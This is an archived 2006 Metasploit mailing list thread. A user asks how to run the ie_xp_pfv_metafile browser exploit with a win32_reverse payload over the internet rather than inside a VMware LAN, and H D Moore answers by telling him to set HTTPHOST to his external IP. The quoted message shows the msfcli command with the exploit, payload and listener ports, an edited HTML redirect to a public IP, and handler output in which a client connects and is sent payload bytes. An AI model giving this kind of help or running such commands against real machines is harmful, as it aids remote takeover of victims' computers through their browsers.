Metasploit mailing list archives
Framework through lan
From: hdm at metasploit.com (H D Moore)
Date: Sat, 28 Jan 2006 22:12:36 -0600
To use a different address for the redirect, just set the HTTPHOST variable to your external IP address. That error message about the patch not matching the module name can be fixed by either changing the "package" line at the top of the file to match the file, or just removing it if you no longer need it. -HD On Saturday 28 January 2006 15:57, 2xyo wrote:
Hello, I test win32_reverse with ie_xp_pfv_metafile exploit in my virtual lan with VMWARE and it's run. But, i couldn't use this exploit without my lan. I don't know how set variable for run this. I haved modify /exploits/ie_xp_pfv_metafile.pm because it redirect to my lan adresse et not public adresse "<html><header><meta http-equiv='refresh' content='0; URL=http://mypublicip${wmfpath}.${ext}'></header><body>". I haved also forward theses ports in my router. twoxyo at debian:~/framework-2.5$ ./msfcli ie_xp_pfv_metafile LHOST=mypublicip HTTPPORT=8080 LPORT=3300 PAYLOAD=win32_reverse E [*] The module Msf::Exploit::ie_xp_pfv_metafile does not match the path /home/twoxyo/framework-2.5/exploits/original_ie_xp_pfv.metafile.pm [*] Starting Reverse Handler. [*] Waiting for connections to http://192.168.1.106:8080/ [*] HTTP Client connected from 192.168.1.1:1279, redirecting... [*] HTTP Client connected from 192.168.1.1:1276, sending 1344 bytes of payload...
Current thread:
- Framework through lan 2xyo (Jan 28)
- Framework through lan H D Moore (Jan 28)
- Framework through lan 2xyo (Jan 29)
- Framework through lan H D Moore (Jan 29)
- Framework through lan 2xyo (Jan 29)
- Framework through lan H D Moore (Jan 28)